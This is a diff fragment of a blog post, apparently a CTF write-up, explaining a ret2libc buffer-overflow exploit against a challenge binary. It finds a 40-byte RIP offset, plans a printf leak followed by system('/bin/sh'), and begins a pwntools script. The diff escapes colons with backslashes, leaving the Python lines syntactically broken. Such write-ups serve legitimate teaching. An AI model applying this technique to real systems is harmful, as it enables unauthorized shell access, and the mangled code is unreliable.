SoumyaEXE/soumya.github.io/_posts/2021-07-31-Ret2TheUnknown.markdown

 pwndbg> cyclic -l 0x6161616b
 40

 The program received a segmentation fault error, and the offset of RIP was calculated to be 40 bytes.
 Therefore, upon inputting 40 junk bytes followed by the address of the main function, the program will repeat.
-Using the info functions GDB command, the address of the main function can be found:
+Using the info functions GDB command, the address of the main function can be found\:

 0x0000000000401186  main
 {% endhighlight %}

-The overall exploit can be summarized into two waves: wave one consists of repeating the main function and retrieving the printf address, and wave two consists of calling the libc system() function with /bin/sh as the argument.
+The overall exploit can be summarized into two waves\: wave one consists of repeating the main function and retrieving the printf address, and wave two consists of calling the libc system() function with /bin/sh as the argument.

 ### PwnTools

 #### Rerunning main()

-Using pwntools[[2]](#ftnt2), a python library made for facilitating the process of writing binary exploits, we can create a program (which was named poc.py) to exploit the program:
+Using pwntools[[2]](#ftnt2), a python library made for facilitating the process of writing binary exploits, we can create a program (which was named poc.py) to exploit the program\:

 {% highlight python %}
 from pwn import *

 REMOTE = False

-if REMOTE:
+if REMOTE\:
    p = remote("mc.ax",31568)
-else:   p = process("./ret2the-unknown")
+else\:   p = process("./ret2the-unknown")

 rip_offset = 40
 main = 0x0000000000401186